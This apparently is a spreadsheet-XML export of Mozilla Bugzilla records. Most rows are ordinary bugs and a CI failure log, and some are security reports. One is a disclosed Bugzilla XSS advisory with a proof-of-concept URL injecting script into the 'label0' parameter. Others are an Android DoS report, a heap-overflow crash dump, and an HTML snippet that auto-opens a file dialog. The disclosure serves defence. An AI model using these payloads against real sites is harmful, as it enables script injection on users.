    &lt;body id="xx"  &gt;
             &lt;input id='fileid' type='file' name='filename'/&gt;
            &lt;button id="yy" &gt;google.com&lt;/button&gt;
    &lt;/body&gt; 
&lt;/html&gt;
&lt;script&gt;
document.getElementById("yy").focus();
document.getElementById("yy").addEventListener("keypress", function(e) {
  if (e.key === "Enter") {
     fullscreen()
  }
});
document.getElementById("fileid").addEventListener("keypress", function(e) {
  if (e.key === "Enter") {
       document.getElementById('fileid').click();
  }
});
const myTimeout = setTimeout(showdialogfile, 1000);
function myStopFunction() {
  clearTimeout(myTimeout);  
}
function showdialogfile() {
 document.getElementById('fileid').click();
}
&lt;/script&gt;</t>
        </is>
      </c>
      <c r="X6274" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6275">
      <c r="A6275" t="n">
        <v>881584</v>
      </c>
      <c r="B6275" t="inlineStr">
        <is>
          <t>2013-06-10 19:02:09 -0700</t>
        </is>
      </c>
      <c r="C6275" t="inlineStr">
        <is>
          <t>[A/V] Background activity keep consuming power when Youtube is paused by power button.</t>
        </is>
      </c>
      <c r="D6275" t="inlineStr">
        <is>
          <t>2013-08-29 20:47:21 -0700</t>
        </is>
      </c>
      <c r="E6275" t="n">
        <v>1</v>
      </c>
      <c r="F6275" t="n">
        <v>1</v>
      </c>
      <c r="G6275" t="n">
        <v>6</v>
      </c>
      <c r="H6275" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I6275" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J6275" t="inlineStr">
        <is>
          <t>Gaia::Video</t>
        </is>
      </c>
      <c r="K6275" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6275" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M6275" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N6275" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6275" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6275" t="inlineStr"/>
      <c r="Q6275" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6275" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S6275" t="inlineStr">
        <is>
          <t>1.1 QE3 (26jun)</t>
        </is>
      </c>
      <c r="T6275" t="n">
        <v>1</v>
      </c>
      <c r="U6275" t="n">
        <v>0</v>
      </c>
      <c r="V6275" t="n">
        <v>44</v>
      </c>
      <c r="W6275" t="inlineStr">
        <is>
          <t>Created attachment 760713
Power consumption graph after patch from Bug 870564
Precondition : Device is connected by 3G.
STR
1. Play youtube
2. push power button
Then, something periodically wake up in background.
It consumes useless power.
This problem may be related to Bug 870564.
Please check attached file (graph) to compare before and after patch from Bug 870564.</t>
        </is>
      </c>
      <c r="X6275" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6276">
      <c r="A6276" t="n">
        <v>7337</v>
      </c>
      <c r="B6276" t="inlineStr">
        <is>
          <t>1999-05-28 23:12:14 -0700</t>
        </is>
      </c>
      <c r="C6276" t="inlineStr">
        <is>
          <t>running makeattachmenttable.sh not included in instructions</t>
        </is>
      </c>
      <c r="D6276" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:20 -0800</t>
        </is>
      </c>
      <c r="E6276" t="n">
        <v>1</v>
      </c>
      <c r="F6276" t="n">
        <v>1</v>
      </c>
      <c r="G6276" t="n">
        <v>4</v>
      </c>
      <c r="H6276" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I6276" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J6276" t="inlineStr">
        <is>
          <t>Attachments &amp; Requests</t>
        </is>
      </c>
      <c r="K6276" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6276" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6276" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N6276" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6276" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6276" t="inlineStr"/>
      <c r="Q6276" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R6276" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6276" t="inlineStr">
        <is>
          <t>Bugzilla old</t>
        </is>
      </c>
      <c r="T6276" t="n">
        <v>1</v>
      </c>
      <c r="U6276" t="n">
        <v>0</v>
      </c>
      <c r="V6276" t="n">
        <v>4</v>
      </c>
      <c r="W6276" t="inlineStr">
        <is>
          <t>Bugzilla needs the script ./makeattachmenttable.sh to be run in order to
properly set up the SQL database. The instructions omit this script in the list
it gives.</t>
        </is>
      </c>
      <c r="X6276" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6277">
      <c r="A6277" t="n">
        <v>697699</v>
      </c>
      <c r="B6277" t="inlineStr">
        <is>
          <t>2011-10-27 06:10:13 -0700</t>
        </is>
      </c>
      <c r="C6277" t="inlineStr">
        <is>
          <t>[SECURITY] XSS when viewing new charts or tabular and graphical reports in debug mode</t>
        </is>
      </c>
      <c r="D6277" t="inlineStr">
        <is>
          <t>2012-01-06 06:43:28 -0800</t>
        </is>
      </c>
      <c r="E6277" t="n">
        <v>1</v>
      </c>
      <c r="F6277" t="n">
        <v>1</v>
      </c>
      <c r="G6277" t="n">
        <v>4</v>
      </c>
      <c r="H6277" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I6277" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J6277" t="inlineStr">
        <is>
          <t>Reporting/Charting</t>
        </is>
      </c>
      <c r="K6277" t="inlineStr">
        <is>
          <t>2.17.1</t>
        </is>
      </c>
      <c r="L6277" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6277" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6277" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6277" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6277" t="inlineStr">
        <is>
          <t>[infrasec:xss][ws:high]</t>
        </is>
      </c>
      <c r="Q6277" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6277" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6277" t="inlineStr">
        <is>
          <t>Bugzilla 3.4</t>
        </is>
      </c>
      <c r="T6277" t="n">
        <v>1</v>
      </c>
      <c r="U6277" t="n">
        <v>0</v>
      </c>
      <c r="V6277" t="n">
        <v>20</v>
      </c>
      <c r="W6277" t="inlineStr">
        <is>
          <t>RedTeam Pentesting discovered a Cross Site-Scripting (XSS) vulnerability
in Bugzilla's chart generator during a penetration test.  If attackers
can persuade users to click on a prepared link or redirected them to
such a link from an attacker-controlled website, they are able to run
arbitrary JavaScript code in the context of the Bugzilla installation's
domain.
Details
=======
Product: Bugzilla
Affected Versions: 3.4.12, 3.6.6, 4.0.2, 4.1.3,
                   possibly all older versions that can generate charts
Vulnerability Type: Cross Site Scripting
Security Risk: high
Vendor URL: http://www.bugzilla.org
Vendor Status: notified
Advisory Status: private
More Details
============
The chart-generating script chart.cgi contains a function plot(), which
creates a new chart:
sub plot {
    validateWidthAndHeight();
    $vars-&gt;{'chart'} = new Bugzilla::Chart($cgi);
    my $format = $template-&gt;get_format("reports/chart", "", scalar($cgi-&gt;param('ctype')));
    # Debugging PNGs is a pain; we need to be able to see the error messages
    if ($cgi-&gt;param('debug')) {
        print $cgi-&gt;header();
        $vars-&gt;{'chart'}-&gt;dump();
    }
    print $cgi-&gt;header($format-&gt;{'ctype'});
    disable_utf8() if ($format-&gt;{'ctype'} =~ /^image\//);
    $template-&gt;process($format-&gt;{'template'}, $vars)
      || ThrowTemplateError($template-&gt;error());
}
The function's code shows that there is a "debug" parameter, that, if
set, will make the function print out the variables (and their contents)
representing the chart for debugging purposes. This includes
user-defined variables sent as parameters, especially "label0". As the
content of this variable is not checked for malicious input, it can be
used to inject arbitrary JavaScript code into the debugging output. In
fact, any variable of the form "labelXXX", where "XXX" is an arbitrary
number, will work.
Proof of Concept
================
The following URL generates a new chart with debugging output enabled,
containing JavaScript code in the "label0" parameter:
http://www.example.org/bugzilla/chart.cgi
  ?category=-All-
  &amp;datefrom=
  &amp;dateto=
  &amp;label0=&lt;script&gt;alert("XSS")&lt;/script&gt;
  &amp;line0=1
  &amp;name=1
  &amp;subcategory=-All-
  &amp;ctype=png
  &amp;action=plot
  &amp;width=600
  &amp;height=350
  &amp;debug=1
Security Risk
=============
The risk of this vulnerability is estimated to be high. Being able to
embed arbitrary JavaScript allows attackers to completely manipulate the
website, adding one's own content and tracking user interaction.
RedTeam Pentesting GmbH
=======================
RedTeam Pentesting offers individual penetration tests, short pentests,
performed by a team of specialised IT-security experts. Hereby, security
weaknesses in company networks or products are uncovered and can be
fixed immediately.
As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security related areas. The results are made available as public
security advisories.
More information about RedTeam Pentesting can be found at
http://www.redteam-pentesting.de.</t>
        </is>
      </c>
      <c r="X6277" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6278">
      <c r="A6278" t="n">
        <v>1503453</v>
      </c>
      <c r="B6278" t="inlineStr">
        <is>
          <t>2018-10-30 18:12:05 -0700</t>
        </is>
      </c>
      <c r="C6278" t="inlineStr">
        <is>
          <t>Perma 'mach static-analysis autotest --intree-tool' did not run successfully. Please check log for errors.</t>
        </is>
      </c>
      <c r="D6278" t="inlineStr">
        <is>
          <t>2022-08-17 14:01:35 -0700</t>
        </is>
      </c>
      <c r="E6278" t="n">
        <v>1</v>
      </c>
      <c r="F6278" t="n">
        <v>1</v>
      </c>
      <c r="G6278" t="n">
        <v>7</v>
      </c>
      <c r="H6278" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I6278" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="J6278" t="inlineStr">
        <is>
          <t>Source Code Analysis</t>
        </is>
      </c>
      <c r="K6278" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6278" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6278" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6278" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6278" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6278" t="inlineStr">
        <is>
          <t>[stockwell fixed]</t>
        </is>
      </c>
      <c r="Q6278" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6278" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S6278" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6278" t="n">
        <v>1</v>
      </c>
      <c r="U6278" t="n">
        <v>0</v>
      </c>
      <c r="V6278" t="n">
        <v>38</v>
      </c>
      <c r="W6278" t="inlineStr">
        <is>
          <t>Filed by: rmaries [at] mozilla.com
https://treeherder.mozilla.org/logviewer.html#?job_id=208737489&amp;repo=autoland
https://queue.taskcluster.net/v1/task/PG8QCrIST_eKSSy9dSSK_A/runs/0/artifacts/public/logs/live_backing.log
https://treeherder.mozilla.org/logviewer.html#?job_id=208737489&amp;repo=autoland&amp;lineNumber=1995
[task 2018-10-30T22:39:01.776Z] ERROR: infer failed to execute gradle [u'autotest:compileInferTestStarvation'].
[task 2018-10-30T22:39:01.777Z] RUNNING: infer check racerd.
[task 2018-10-30T22:39:03.542Z] RUNNING: infer check checkers.
[task 2018-10-30T22:39:11.108Z] 22:39:11  WARNING - setting return code to 2
[task 2018-10-30T22:39:11.109Z] 22:39:11    FATAL - 'mach static-analysis autotest --intree-tool' did not run successfully. Please check log for errors.
[task 2018-10-30T22:39:11.110Z] 22:39:11    FATAL - Running post_fatal callback...
[task 2018-10-30T22:39:11.112Z] 22:39:11    FATAL - Exiting -1
[task 2018-10-30T22:39:11.113Z] 22:39:11     INFO - [mozharness: 2018-10-30 22:39:11.112870Z] Finished static-analysis-autotest step (failed)
[task 2018-10-30T22:39:11.113Z] 22:39:11     INFO - Running post-run listener: _shutdown_sccache
[task 2018-10-30T22:39:11.114Z] 22:39:11     INFO - Running command: ['/builds/worker/workspace/build/src/sccache2/sccache', '--stop-server'] in /builds/worker/workspace/build/src
[task 2018-10-30T22:39:11.115Z] 22:39:11     INFO - Copy/paste: /builds/worker/workspace/build/src/sccache2/sccache --stop-server
[task 2018-10-30T22:39:11.120Z] 22:39:11     INFO -  Stopping sccache server...
[task 2018-10-30T22:39:11.121Z] 22:39:11     INFO -  Compile requests               337
[task 2018-10-30T22:39:11.122Z] 22:39:11     INFO -  Compile requests executed      202
[task 2018-10-30T22:39:11.123Z] 22:39:11     INFO -  Cache hits                     168
[task 2018-10-30T22:39:11.124Z] 22:39:11     INFO -  Cache misses                     0
[task 2018-10-30T22:39:11.125Z] 22:39:11     INFO -  Cache timeouts                   0
[task 2018-10-30T22:39:11.126Z] 22:39:11     INFO -  Cache read errors                0
[task 2018-10-30T22:39:11.126Z] 22:39:11     INFO -  Forced recaches                  0
[task 2018-10-30T22:39:11.128Z] 22:39:11     INFO -  Cache write errors               0
[task 2018-10-30T22:39:11.128Z] 22:39:11     INFO -  Compilation failures             8
[task 2018-10-30T22:39:11.129Z] 22:39:11     INFO -  Cache errors                    26
[task 2018-10-30T22:39:11.130Z] 22:39:11     INFO -  Non-cacheable compilations       0
[task 2018-10-30T22:39:11.131Z] 22:39:11     INFO -  Non-cacheable calls             30
[task 2018-10-30T22:39:11.132Z] 22:39:11     INFO -  Non-compilation calls          105
[task 2018-10-30T22:39:11.133Z] 22:39:11     INFO -  Unsupported compiler calls       0
[task 2018-10-30T22:39:11.134Z] 22:39:11     INFO -  Average cache write          0.000 s
[task 2018-10-30T22:39:11.135Z] 22:39:11     INFO -  Average cache read miss      0.000 s
[task 2018-10-30T22:39:11.136Z] 22:39:11     INFO -  Average cache read hit       0.022 s
[task 2018-10-30T22:39:11.137Z] 22:39:11     INFO -  Cache location             S3, bucket: Bucket(name=taskcluster-level-3-sccache-us-west-1, base_url=http://taskcluster-level-3-sccache-us-west-1.s3.amazonaws.com/)
[task 2018-10-30T22:39:11.138Z] 22:39:11     INFO - Return code: 0
[task 2018-10-30T22:39:11.139Z] 22:39:11     INFO - Running post-run listener: _summarize
[task 2018-10-30T22:39:11.140Z] 22:39:11    ERROR - # TBPL FAILURE #
[task 2018-10-30T22:39:11.140Z] 22:39:11     INFO - [mozharness: 2018-10-30 22:39:11.140704Z] FxDesktopBuild summary:
[task 2018-10-30T22:39:11.141Z] 22:39:11    ERROR - # TBPL FAILURE #
[taskcluster 2018-10-30 22:39:11.898Z] === Task Finished ===
[taskcluster 2018-10-30 22:39:19.174Z] Unsuccessful task run with exit code: 255 completed in 1281.868 seconds</t>
        </is>
      </c>
      <c r="X6278" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6279">
      <c r="A6279" t="n">
        <v>1759951</v>
      </c>
      <c r="B6279" t="inlineStr">
        <is>
          <t>2022-03-16 17:24:46 -0700</t>
        </is>
      </c>
      <c r="C6279" t="inlineStr">
        <is>
          <t>DOS - The long parameter makes the user have to delete the Firefox browser Android</t>
        </is>
      </c>
      <c r="D6279" t="inlineStr">
        <is>
          <t>2024-05-30 10:54:43 -0700</t>
        </is>
      </c>
      <c r="E6279" t="n">
        <v>1</v>
      </c>
      <c r="F6279" t="n">
        <v>1</v>
      </c>
      <c r="G6279" t="n">
        <v>2</v>
      </c>
      <c r="H6279" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I6279" t="inlineStr">
        <is>
          <t>Fenix</t>
        </is>
      </c>
      <c r="J6279" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K6279" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6279" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6279" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N6279" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6279" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6279" t="inlineStr">
        <is>
          <t>[reporter-external] [web-bounty-form][post-critsmash-triage][adv-main103+]</t>
        </is>
      </c>
      <c r="Q6279" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R6279" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S6279" t="inlineStr">
        <is>
          <t>108 Branch</t>
        </is>
      </c>
      <c r="T6279" t="n">
        <v>1</v>
      </c>
      <c r="U6279" t="n">
        <v>0</v>
      </c>
      <c r="V6279" t="n">
        <v>74</v>
      </c>
      <c r="W6279" t="inlineStr">
        <is>
          <t>Created attachment 9268170
open this to get the DoS link
Hi all, 
I just tested DOS on several android browsers, I saw that your android version of Firefox is vulnerable to DOS, the impact is quite severe the user has to delete your Firefox browser so that Back to normal. 
Production steps:
1. Send this payload DOS via email (victim)
- open the link in the attachment below.txt
2. When the victim creates the payload link above, the Firefox browser will be exposed to DOS, which requires the victim to reinstall Firefox. 
PoC videos:
- https://drive.google.com/file/d/1j3_IfXna1TgcHe8uZgnWVmLj10T4XFFv/view
Impact :
DOS This causes important data to be lost in the victim's browser because they have to delete the browser to return to normal, even users can switch to other browsers</t>
        </is>
      </c>
      <c r="X6279" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6280">
      <c r="A6280" t="n">
        <v>1505973</v>
      </c>
      <c r="B6280" t="inlineStr">
        <is>
          <t>2018-11-08 16:02:34 -0800</t>
        </is>
      </c>
      <c r="C6280" t="inlineStr">
        <is>
          <t>Mozilla Firefox "VertexBuffer11" Heap Overflow Code Execution Vulnerability (iDefense Zero Day)</t>
        </is>
      </c>
      <c r="D6280" t="inlineStr">
        <is>
          <t>2019-08-07 17:15:39 -0700</t>
        </is>
      </c>
      <c r="E6280" t="n">
        <v>1</v>
      </c>
      <c r="F6280" t="n">
        <v>1</v>
      </c>
      <c r="G6280" t="n">
        <v>3</v>
      </c>
      <c r="H6280" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6280" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6280" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K6280" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6280" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6280" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6280" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6280" t="inlineStr">
        <is>
          <t>WORKSFORME</t>
        </is>
      </c>
      <c r="P6280" t="inlineStr">
        <is>
          <t>[adv-main64+]</t>
        </is>
      </c>
      <c r="Q6280" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6280" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6280" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6280" t="n">
        <v>1</v>
      </c>
      <c r="U6280" t="n">
        <v>0</v>
      </c>
      <c r="V6280" t="n">
        <v>15</v>
      </c>
      <c r="W6280" t="inlineStr">
        <is>
          <t>Created attachment 9023811
vertex_buff_poc.html
We received the following submission from iDefense today:
iDefense VCP Submission V-6v2c5n6tc4
11/08/2018
Mozilla Firefox "VertexBuffer11" Heap Overflow Code Execution Vulnerability (iDefense Zero Day)
Description: 
Remote exploitation of a heap overflow vulnerability in Mozilla Foundation's Firefox could allow an attacker to execute arbitrary code with the privileges of the current user. 
Analysis: 
A heap overflow vulnerability has been identified in Firefox . This vulnerability can be triggered by manipulating the HTML elements within a website using javascript. Specifically, the error occurs in the way a heap based buffer in a certain function within the VertexBuffer11 module is managed in memory. This condition can cause memory corruption, leading to the execution of arbitrary code.
Credit: 
Omair working with iDefense Labs
Tested on Windows 10 x64 and Firefox 63.0
The vulnerability is in ANGLE used by Firefox for WebGL which results in heap corruption.
6:251&gt; r
rax=000001a777880000 rbx=000001a701436400 rcx=00007ffdc574cab1
rdx=000001a6b3508502 rsi=000001a777880000 rdi=000001a7012eaf40
rip=00007ffdc574cab1 rsp=000000433dbfce88 rbp=00007ffd820b0b90
 r8=0000000000000002  r9=00007ffdc5740000 r10=000001a6b3508502
r11=000001a777880000 r12=000001a6b3508502 r13=0000000000000002
r14=0000000000000001 r15=000000433dbfda48
iopl=0         nv up ei pl nz na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
VCRUNTIME140!MoveSmall+0x4a:
00007ffd`c574cab1 0fb70a          movzx   ecx,word ptr [rdx] ds:000001a6`b3508502=????
6:251&gt; k
 # Child-SP          RetAddr           Call Site
00 00000043`3dbfce88 00007ffd`81f67860 VCRUNTIME140!memcpy+0xe1
01 00000043`3dbfce90 00007ffd`81efeb69 libGLESv2!rx::VertexBuffer11::storeVertexAttributes+0x250 [z:\build\build\src\gfx\angle\checkout\src\libANGLE\renderer\d3d\d3d11\VertexBuffer11.cpp @ 130] 
02 00000043`3dbfd020 00007ffd`81f00ae1 libGLESv2!rx::StreamingVertexBufferInterface::storeDynamicAttribute+0x309 [z:\build\build\src\gfx\angle\checkout\src\libANGLE\renderer\d3d\VertexBuffer.cpp @ 178] 
03 00000043`3dbfd1d0 00007ffd`81f67038 libGLESv2!rx::VertexDataManager::storeDynamicAttribs+0x561 [z:\build\build\src\gfx\angle\checkout\src\libANGLE\renderer\d3d\VertexDataManager.cpp @ 427] 
04 00000043`3dbfd3e0 00007ffd`81f44fa3 libGLESv2!rx::VertexArray11::syncStateForDraw+0x538 [z:\build\build\src\gfx\angle\checkout\src\libANGLE\renderer\d3d\d3d11\VertexArray11.cpp @ 144] 
05 00000043`3dbfd5d0 00007ffd`81f17d0c libGLESv2!rx::StateManager11::updateState+0x6f3 [z:\build\build\src\gfx\angle\checkout\src\libANGLE\renderer\d3d\d3d11\StateManager11.cpp @ 2036] 
06 00000043`3dbfd9c0 00007ffd`81decce9 libGLESv2!rx::Context11::drawElements+0x2c [z:\build\build\src\gfx\angle\checkout\src\libANGLE\renderer\d3d\d3d11\Context11.cpp @ 265] 
07 00000043`3dbfda10 00007ffd`81d794b7 libGLESv2!gl::Context::drawElements+0xa9 [z:\build\build\src\gfx\angle\checkout\src\libANGLE\Context.cpp @ 2100] 
08 00000043`3dbfda90 00007ffd`687a0c7a libGLESv2!gl::DrawElements+0x137 [z:\build\build\src\gfx\angle\checkout\src\libGLESv2\entry_points_gles_2_0_autogen.cpp @ 787] 
09 00000043`3dbfdb10 00007ffd`6940b6c9 xul!mozilla::gl::GLContext::raw_fDrawElements+0x3a [z:\build\build\src\gfx\gl\GLContext.h @ 1105] 
0a 00000043`3dbfdb60 00007ffd`69034e82 xul!mozilla::WebGLContext::DrawElementsInstanced+0x4c9 [z:\build\build\src\dom\canvas\WebGLContextDraw.cpp @ 807] 
0b 00000043`3dbfdc70 00007ffd`6906739d xul!mozilla::WebGLContext::DrawElements+0x62 [z:\build\build\src\dom\canvas\WebGLContext.h @ 1354] 
0c 00000043`3dbfdcf0 00007ffd`669a491d xul!mozilla::dom::WebGLRenderingContext_Binding::drawElements+0xdd [z:\build\build\src\obj-firefox\dom\bindings\WebGLRenderingContextBinding.cpp @ 15074] 
0d 00000043`3dbfdd80 00007ffd`67b8773c xul!mozilla::dom::binding_detail::GenericMethod&lt;mozilla::dom::binding_detail::NormalThisPolicy,mozilla::dom::binding_detail::ThrowExceptions&gt;+0xfd [z:\build\build\src\dom\bindings\BindingUtils.cpp @ 3296] 
0e 00000043`3dbfde40 00007ffd`67b87ffb xul!js::InternalCallOrConstruct+0x16c [z:\build\build\src\js\src\vm\Interpreter.cpp @ 537] 
0f 00000043`3dbfdf30 00007ffd`67b7c829 xul!InternalCall+0xbb [z:\build\build\src\js\src\vm\Interpreter.cpp @ 588] 
10 00000043`3dbfdf90 00007ffd`67b79ff1 xul!Interpret+0x2689 [z:\build\build\src\js\src\vm\Interpreter.cpp @ 3267] 
11 00000043`3dbfe370 00007ffd`67b88adc xul!js::RunScript+0x191 [z:\build\build\src\js\src\vm\Interpreter.cpp @ 429] 
12 00000043`3dbfe480 00007ffd`67b88c7a xul!js::ExecuteKernel+0xcc [z:\build\build\src\js\src\vm\Interpreter.cpp @ 777] 
13 00000043`3dbfe520 00007ffd`673b29f7 xul!js::Execute+0xca [z:\build\build\src\js\src\vm\Interpreter.cpp @ 809] 
14 00000043`3dbfe5a0 00007ffd`66cbf226 xul!ExecuteScript+0xc7 [z:\build\build\src\js\src\jsapi.cpp @ 4691] 
15 00000043`3dbfe640 00007ffd`67010c7a xul!nsJSUtils::ExecutionContext::CompileAndExec+0x46 [z:\build\build\src\dom\base\nsJSUtils.cpp @ 254] 
16 00000043`3dbfe680 00007ffd`6700e3d9 xul!mozilla::dom::ScriptLoader::ProcessRequest+0xcfa [z:\build\build\src\dom\script\ScriptLoader.cpp @ 2046] 
17 00000043`3dbfe9c0 00007ffd`6700bd00 xul!mozilla::dom::ScriptLoader::ProcessScriptElement+0x1399 [z:\build\build\src\dom\script\ScriptLoader.cpp @ 1366] 
18 00000043`3dbfedf0 00007ffd`6700cd63 xul!mozilla::dom::ScriptElement::MaybeProcessScript+0x1d0 [z:\build\build\src\dom\script\ScriptElement.cpp @ 141] 
19 00000043`3dbfee70 00007ffd`66b98fde xul!nsHtml5TreeOpExecutor::RunScript+0xf3 [z:\build\build\src\parser\html\nsHtml5TreeOpExecutor.cpp @ 738] 
1a 00000043`3dbfeed0 00007ffd`66b98afd xul!nsHtml5TreeOpExecutor::RunFlushLoop+0x4ce [z:\build\build\src\parser\html\nsHtml5TreeOpExecutor.cpp @ 540] 
1b 00000043`3dbfefa0 00007ffd`67f2b9df xul!nsHtml5ExecutorFlusher::Run+0x1d [z:\build\build\src\parser\html\nsHtml5StreamParser.cpp @ 123] 
1c 00000043`3dbfefd0 00007ffd`66921026 xul!mozilla::SchedulerGroup::Runnable::Run+0x2f [z:\build\build\src\xpcom\threads\SchedulerGroup.cpp @ 337] 
1d 00000043`3dbff010 00007ffd`66920cc9 xul!nsThread::ProcessNextEvent+0x2c6 [z:\build\build\src\xpcom\threads\nsThread.cpp @ 1108] 
1e 00000043`3dbff150 00007ffd`66af4b4b xul!NS_ProcessNextEvent+0x29 [z:\build\build\src\xpcom\threads\nsThreadUtils.cpp @ 519] 
1f 00000043`3dbff1a0 00007ffd`66901078 xul!mozilla::ipc::MessagePump::Run+0xfb [z:\build\build\src\ipc\glue\MessagePump.cpp @ 97] 
20 00000043`3dbff210 00007ffd`66920861 xul!MessageLoop::RunHandler+0x28 [z:\build\build\src\ipc\chromium\src\base\message_loop.cc @ 319] 
21 00000043`3dbff260 00007ffd`66af4a28 xul!MessageLoop::Run+0x51 [z:\build\build\src\ipc\chromium\src\base\message_loop.cc @ 299] 
22 00000043`3dbff2b0 00007ffd`66af4273 xul!nsBaseAppShell::Run+0x28 [z:\build\build\src\widget\nsBaseAppShell.cpp @ 160] 
23 00000043`3dbff2f0 00007ffd`6aad7f65 xul!nsAppShell::Run+0x23 [z:\build\build\src\widget\windows\nsAppShell.cpp @ 420] 
24 00000043`3dbff320 00007ffd`66901078 xul!XRE_RunAppShell+0x45 [z:\build\build\src\toolkit\xre\nsEmbedFunctions.cpp @ 944] 
25 00000043`3dbff360 00007ffd`66920861 xul!MessageLoop::RunHandler+0x28 [z:\build\build\src\ipc\chromium\src\base\message_loop.cc @ 319] 
26 00000043`3dbff3b0 00007ffd`6aad7b71 xul!MessageLoop::Run+0x51 [z:\build\build\src\ipc\chromium\src\base\message_loop.cc @ 299] 
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for firefox.exe - 
27 00000043`3dbff400 00007ff6`b6be14e5 xul!XRE_InitChildProcess+0x6d1 [z:\build\build\src\toolkit\xre\nsEmbedFunctions.cpp @ 774] 
28 00000043`3dbff5f0 00007ff6`b6be143b firefox!Ordinal0+0x14e5
29 00000043`3dbff650 00007ff6`b6be1106 firefox!Ordinal0+0x143b
2a 00000043`3dbff6d0 00007ff6`b6c1c824 firefox!Ordinal0+0x1106
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\System32\KERNEL32.DLL - 
2b 00000043`3dbff730 00007ffd`cb2a7e94 firefox!TargetNtUnmapViewOfSection+0x9294
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for ntdll.dll - 
2c 00000043`3dbff770 00007ffd`cbf57ad1 KERNEL32!BaseThreadInitThunk+0x14
2d 00000043`3dbff7a0 00000000`00000000 ntdll!RtlUserThreadStart+0x21
6:251&gt; dx Debugger.Sessions[0].Processes[23304].Threads[20040].Stack.Frames[1].SwitchTo();dv /t /v
Debugger.Sessions[0].Processes[23304].Threads[20040].Stack.Frames[1].SwitchTo()
&lt;unavailable&gt;     class rx::VertexBuffer11 * this = &lt;value unavailable&gt;
